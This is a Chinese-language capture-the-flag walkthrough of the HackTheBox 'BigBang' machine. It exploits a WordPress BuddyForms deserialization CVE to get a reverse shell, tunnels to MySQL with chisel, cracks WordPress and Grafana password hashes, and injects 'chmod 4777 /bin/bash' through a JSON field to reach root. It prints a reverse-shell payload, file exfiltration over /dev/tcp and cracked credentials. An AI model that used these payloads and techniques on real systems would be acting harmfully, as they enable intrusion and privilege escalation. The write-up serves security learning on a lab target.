HTB - BigBang

关注公众号夜风Sec，持续分享各种工具&学习记录，与师傅共同进步:)

信息收集

nmap

nmap --min-rate 10000 -A 10.10.11.52

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 d4:15:77:1e:82:2b:2f:f1:cc:96:c6:28:c1:86:6b:3f (ECDSA)
|_  256 6c:42:60:7b:ba:ba:67:24:0f:0c:ac:5d:be:92:0c:66 (ED25519)
80/tcp open  http    Apache httpd 2.4.62
|_http-title: Did not follow redirect to http://blog.bigbang.htb/
|_http-server-header: Apache/2.4.62 (Debian)

添加hosts解析

sudo vim /etc/hosts
# 添加一行
10.10.11.52 blog.bigbang.htb

wappalyzer插件

通过该插件，可以发现是wordpress框架

wpscan

wpscan --url http://blog.bigbang.htb/ --enumerate u --api-token <Your-token>

[+] WordPress theme in use: twentytwentyfour
 | Location: http://blog.bigbang.htb/wp-content/themes/twentytwentyfour/
 | Last Updated: 2024-11-13T00:00:00.000Z
 | Readme: http://blog.bigbang.htb/wp-content/themes/twentytwentyfour/readme.txt
 | [!] The version is out of date, the latest version is 1.3
 | [!] Directory listing is enabled
 | Style URL: http://blog.bigbang.htb/wp-content/themes/twentytwentyfour/style.css
 | Style Name: Twenty Twenty-Four
 | Style URI: https://wordpress.org/themes/twentytwentyfour/
 | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blog.bigbang.htb/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.1'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:02 <================================================================================> (10 / 10) 100.00% Time: 00:00:02

[i] User(s) Identified:

[+] root
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] shawking
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

wpscan --url http://blog.bigbang.htb/ --api-token <TOKEN>

主题twentytwentyfour 扫描到漏洞
插件buddyforms 扫描到漏洞

对于buddyforms插件：

分析文章：https://medium.com/tenable-techblog/wordpress-buddyforms-plugin-unauthenticated-insecure-deserialization-cve-2023-26326-3becb5575ed8

Poc：https://github.com/omarelshopky/exploit_cve-2023-26326_using_cve-2024-2961

cve-2023-26326

python exploit.py "<TARGET_URL>/wp-admin/admin-ajax.php"'bash -c "bash -i >& /dev/tcp/<ATTACKER_IP>/<ATTACKER_PORT> 0>&1"'

nc -lvvp port

wp-config.php文件

/** Database username */
define( 'DB_USER', 'wp_user' );

/** Database password */
define( 'DB_PASSWORD', 'wp_password' );

/** Database hostname */
define( 'DB_HOST', '172.17.0.1' );

mysql连接 -> 发现没有这个命令

注意：172.17.0.1这个IP地址常常是Docker默认网桥网络中宿主机的 IP 地址 -> 根目录下存在 .dockerenv

chisel代理

由于shell(目标机器)上面没有mysql命令 -> 下一步我们要通过mysql连接进数据库 -> 通过代理实现在本机进行连接

目标机器上的chisel通过wget命令获取：本地开一个python服务

本地(当前目录下有chisel)：python -m http.server 90
目标机器: wget http://10.10.16.70:90/chisel

本机服务端：chisel server --reverse --port 4444

目标机器的shell：./chisel client 10.10.16.70:4444 R:3306:172.17.0.1:3306

本机服务器：mysql -h 127.0.0.1 -P 3306 -u wp_user -p

• R:<远程监听端口>:<目标地址>:<目标端口>

mysql 哈希

use wordpress;
select * from wp_users;

root:$P$Beh5HLRUlTi1LpLEAstRyXaaBOJICj1
shawking:$P$Br7LUHG9NjNk6/QSYm2chNHfxWdoK./

john user --wordlist=/usr/share/wordlists/rockyou.txt
john user --show

shawking:quantumphysics

ssh - user.txt

ssh [email protected]

cat user.txt

netstat -antlp

tcp        0      0 127.0.0.1:43239         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:9090          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN

这几个端口被使用，不是常见服务的默认端口，利用转发依次测试

端口转发

ssh [email protected] -L 3000:127.0.0.1:3000ssh [email protected] -L 9090:127.0.0.1:9090

依次转发，经过测试 3000 端口存在服务Grafana v11.0.09090端口，通过dirsearch发现一个login目录

不允许GET方法 -> 应该是POST请求 => 根据login接口 -> 登录用的

3000端口 - Grafana

谷歌搜版本漏洞 -> 找到一个 -> 但是需要用户凭证 => 尝试密码复用(上面的用户) -> 失败

https://github.com/nollium/CVE-2024-9264

接下来就要寻找凭证了 -> /opt/data 目录下存在 grafana.db数据库

• /opt：存放的是第三方软件

cat grafana.db > /dev/tcp/10.10.16.70/1234

nc -lvvp 1234 > grafana.db

将数据库文件 发送到本机 进行分析

grafana2hashcat & hashcat

查看这个数据库，哈希+盐
利用github项目grafana2hashcat -> 转换为hashcat可以爆破的数据

https://github.com/iamaldi/grafana2hashcat

sha256:10000:NHVtZWJCSnVjdg==:foAYpCEO+66xLwEVWApHb+j5ik+braJyDmUmVIYMWduTV3sSIBwBUSVjddb4g/G42WA=:bigbang
得到一个bigbang

developer:bigbang

获取凭证之后尝试上面的CVE, 发现失败了

python CVE-2024-9264.py  -u developer -p bigbang -c id  http://localhost:3000

[+] Logged in as developer:bigbang
[+] Executing command: id
[-] DuckDB is not installed on the target system. This exploit requires DuckDB to be present in
the system PATH.

9090端口 - /login

使用POST方法进行请求(HackBar插件) -> 415状态码 -> 数据类型要是application/json的 -> 由于是login接口 -> 所以一般是账号密码的json

用curl尝试请求 -> 返回有jwt数据

curl -X POST 127.0.0.1:9090/login -H "Content-Type: application/json" -d '{"username":"developer","password":"bigbang"}'

{"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTc0NTQ5OTMwMiwianRpIjoiOTM0MzNjYTMtMTFmYy00NmE5LTg4YWEtNTNmOTM3ODQ3NTBmIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldmVsb3BlciIsIm5iZiI6MTc0NTQ5OTMwMiwiY3NyZiI6IjUxNWRjMjQyLTZhZWItNDg4Yy04ZmE3LTdmOThkN2M1ZjQ1MyIsImV4cCI6MTc0NTUwMjkwMn0.1hot0uOSMQOXJxwgBqKfVPmDv-7yXFDUY5yn5m5JlBg"}

得到了developer的密码，可以尝试在ssh中切换到developer用户

横向移动 -> developer

su developer

发现有apk文件...同样的方法弄到本地, 反编译

给gpt分析

使用jadx-gui反编译的和kali命令反编译出来的不一样apktool d a.apk -o apk

在网上找的，不会java反编译

import requests

url = "http://127.0.0.1:9090/command"
headers = {    
"Host": "127.0.0.1:9090",    
"User-Agent": "curl/8.10.1",    
"Accept": "*/*",    
"Content-Type": "application/json",    
"Authorization": "Bearer <JWT>"
}
payload = {    "command": "send_image",    "output_file": "foo n chmod 4777 /bin/bash"}
response = requests.post(url, headers=headers, json=payload)
print("Status Code:", response.status_code)
print("Response Body:", response.text)

在目标shell上执行代码 -> 作用是给 bash 一个SUID权限

总结

wordpress框架 -> wpscan -> 扫到插件的漏洞 -> CVE -> GetShell
chisel代理连接数据库 -> 密码哈希 -> ssh登录
端口转发 -> Grafana服务 -> 寻找凭证 -> 数据库文件 -> grafana2hashcat & hashcat -> developer密码
apk反编译 -> smali ..... root